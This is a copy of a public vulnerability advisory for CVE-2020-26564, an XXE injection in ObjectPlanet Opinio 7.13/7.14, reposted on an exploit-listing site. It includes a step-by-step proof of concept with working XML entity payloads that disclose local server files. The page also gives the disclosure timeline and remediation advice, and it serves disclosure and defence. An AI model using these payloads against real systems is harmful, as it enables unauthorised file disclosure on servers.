Advertisement






ObjectPlanet Opinio 7.13 / 7.14 XML Injection

CVE Category Price Severity
CVE-2020-26564 CWE-91 N/A Medium
Author Risk Exploitation Type Date
N/A Medium Remote 2021-08-01
CVSS EPSS EPSSP
CVSS:6.4/AV:N/AC:L/PR:P/UI:N/S:C/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021080002

Below is a copy:

ObjectPlanet Opinio 7.13 / 7.14 XML Injection
# Exploit Authors: Timothy Tan , Daniel Tan, Yu EnHui, Khor Yong Heng
# CVE: CVE-2020-26564

# Exploit Title: ObjectPlanet Opinio version 7.13/7.14 allows XXE injection
# Vendor Homepage: https://www.objectplanet.com/opinio/
# Software Link: https://www.objectplanet.com/opinio/
# Exploit Authors: Timothy Tan , Daniel Tan, Yu EnHui, Khor Yong Heng
# CVE: CVE-2020-26564

# Timeline
- September 2020: Initial discovery
- October 2020:  Reported to ObjectPlanet
- November 2020:  Fix/patch provided by ObjectPlanet
- July 2021:  CVE-2020-26564

# 1. Introduction
Opinio is a survey management solution by ObjectPlanet that allows surveys to be designed, published and managed.

# 2. Vulnerability Details
ObjectPlanet Opinio before version 7.13 and 7.14 is vulnerable to XXE injection.

# 3. Proof of Concept

### XXE leading to local file disclosure ###

Step 1: 

URL: /opinio/admin/file.do?action=viewEditFileResource&resourceType=6&resourcePatch=upload/css/common/blueSurvey.css

Opinio allows an administrative user to edit local CSS files, this is used to change the contents of a CSS file to a dtd reference file for the XXE injection
The existing blueSurvey.css file was chosen for this PoC. Replace the contents of the file with:  

<!ENTITY all "%start;%file;%end;">

-------------------------------------------------------

Step 2: 

Utilize Opinios survey module and create a generic survey template. Export the template .xml file and add this snippet into the top of the .xml file:

<!ENTITY % file SYSTEM "file:////C:\Users\">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM
"file:////C:\<BASE_DIRECTORY>\opinio\upload\css\common\blueSurvey.css">
%dtd;

Ensure the surveyIntro tag is inserted with the following payload (This will output the result in the
surveyIntro field):

<surveyIntro>&all;</surveyIntro>

The base directory can be guessed via the information under Setup >> Edit System Settings , this page on Opinio shows the local directory of where Opinio was installed to. 

Import the modified .xml file to: 
/survey/admin/folderSurvey.do?action=viewImportSurvey['importFile']

-------------------------------------------------------

Step 3: 

The C:\Users\ directory can be viewed at :
/opinio/admin/preview.do?action=previewSurvey&surveyId=<SURVEY_ID>


This vulnerability was confirmed by ObjectPlanet Opinio in their patch notes which can be found at : https://www.objectplanet.com/opinio/changelog.html


# 4. Remediation
Apply the latest fix/patch from objectplanet.

# 5. Credits
Timothy Tan (https://sg.linkedin.com/in/timtjh)
Khor Yong Heng (https://www.linkedin.com/in/khor-yong-heng-66108a120/)
Yu EnHui (https://www.linkedin.com/in/enhui-yu-88691b15b/)
Daniel Tan (https://www.linkedin.com/in/dantanjk/)

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum